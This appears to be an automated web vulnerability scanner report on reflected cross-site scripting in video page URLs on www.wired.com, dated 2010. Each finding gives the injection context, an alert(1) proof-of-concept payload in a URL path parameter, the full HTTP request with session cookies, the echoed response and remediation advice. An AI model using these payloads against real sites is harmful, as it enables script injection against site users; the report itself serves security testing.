The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67547"-alert(1)-"25f8c3ce3fd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest67547"-alert(1)-"25f8c3ce3fd/1815816633/cowboys-and-aliens-trailer/681412282001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=271 Expires: Mon, 22 Nov 2010 00:42:11 GMT Date: Mon, 22 Nov 2010 00:37:40 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106771
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97411"-alert(1)-"560ba4b52d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/181581663397411"-alert(1)-"560ba4b52d/cowboys-and-aliens-trailer/681412282001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:42:55 GMT Date: Mon, 22 Nov 2010 00:37:55 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106727
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5709"-alert(1)-"f9b8b940f08 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/cowboys-and-aliens-trailera5709"-alert(1)-"f9b8b940f08/681412282001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:43:21 GMT Date: Mon, 22 Nov 2010 00:38:21 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106753
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26356"-alert(1)-"ad495767de was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/cowboys-and-aliens-trailer/68141228200126356"-alert(1)-"ad495767de HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:43:30 GMT Date: Mon, 22 Nov 2010 00:38:30 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106772
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fa19"><a>84501b99538 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video8fa19"><a>84501b99538/latest-videos/latest/1815816633/danny-boyle-traps-james-franco-in-chasm-for-127-hours/650949108001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29448 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:44:42 GMT Date: Mon, 22 Nov 2010 00:39:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video8fa19"><a>84501b99538 ss_latest-videos c_latest"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 2a912--><script>alert(1)</script>d33d36d23a9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /video2a912--><script>alert(1)</script>d33d36d23a9/latest-videos/latest/1815816633/danny-boyle-traps-james-franco-in-chasm-for-127-hours/650949108001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29487 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:45:35 GMT Date: Mon, 22 Nov 2010 00:40:35 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /video2a912--><script>alert(1)</script>d33d36d23a9/latest-videos/latest/1815816633/danny-boyle-traps-james-franco-in-chasm-for-127-hours/650949108001 --> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7290d"><a>06334098279 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos7290d"><a>06334098279/latest/1815816633/danny-boyle-traps-james-franco-in-chasm-for-127-hours/650949108001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=295 Expires: Mon, 22 Nov 2010 00:45:37 GMT Date: Mon, 22 Nov 2010 00:40:42 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106794
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos7290d"><a>06334098279 c_latest"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b46a9"-alert(1)-"65be922ee1d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videosb46a9"-alert(1)-"65be922ee1d/latest/1815816633/danny-boyle-traps-james-franco-in-chasm-for-127-hours/650949108001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:46:40 GMT Date: Mon, 22 Nov 2010 00:41:40 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106828
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... "text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f235"><a>b8db29e0880 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/latest9f235"><a>b8db29e0880/1815816633/danny-boyle-traps-james-franco-in-chasm-for-127-hours/650949108001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:46:44 GMT Date: Mon, 22 Nov 2010 00:41:44 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106784
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_latest9f235"><a>b8db29e0880"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7eacf"-alert(1)-"d294990f37b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest7eacf"-alert(1)-"d294990f37b/1815816633/danny-boyle-traps-james-franco-in-chasm-for-127-hours/650949108001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:47:27 GMT Date: Mon, 22 Nov 2010 00:42:27 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106808
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... "text/javascript">
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c957"-alert(1)-"58f021e9e0d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/18158166331c957"-alert(1)-"58f021e9e0d/danny-boyle-traps-james-franco-in-chasm-for-127-hours/650949108001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:47:36 GMT Date: Mon, 22 Nov 2010 00:42:36 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106770
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... "text/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f03ae"-alert(1)-"0b563d8314b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/danny-boyle-traps-james-franco-in-chasm-for-127-hoursf03ae"-alert(1)-"0b563d8314b/650949108001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:47:43 GMT Date: Mon, 22 Nov 2010 00:42:43 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106709
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9b449"-alert(1)-"0bf58a7d3e0 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/danny-boyle-traps-james-franco-in-chasm-for-127-hours/6509491080019b449"-alert(1)-"0bf58a7d3e0 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=293 Expires: Mon, 22 Nov 2010 00:47:49 GMT Date: Mon, 22 Nov 2010 00:42:56 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106800
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... "text/javascript">
The value of REST URL parameter 1 is copied into an HTML comment. The payload b932e--><script>alert(1)</script>cd14f4422d2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /videob932e--><script>alert(1)</script>cd14f4422d2/latest-videos/latest/1815816633/disneys-cars-2-goes-international/677756918001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29467 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:41:00 GMT Date: Mon, 22 Nov 2010 00:36:00 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /videob932e--><script>alert(1)</script>cd14f4422d2/latest-videos/latest/1815816633/disneys-cars-2-goes-international/677756918001 --> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89964"><a>de99cc590e1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video89964"><a>de99cc590e1/latest-videos/latest/1815816633/disneys-cars-2-goes-international/677756918001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29428 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:39:52 GMT Date: Mon, 22 Nov 2010 00:34:52 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video89964"><a>de99cc590e1 ss_latest-videos c_latest"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86122"><a>8261dbdb8fd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos86122"><a>8261dbdb8fd/latest/1815816633/disneys-cars-2-goes-international/677756918001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=290 Expires: Mon, 22 Nov 2010 00:40:55 GMT Date: Mon, 22 Nov 2010 00:36:05 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106703
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos86122"><a>8261dbdb8fd c_latest"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38a57"-alert(1)-"bc5972f94a3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos38a57"-alert(1)-"bc5972f94a3/latest/1815816633/disneys-cars-2-goes-international/677756918001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:42:05 GMT Date: Mon, 22 Nov 2010 00:37:05 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106717
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
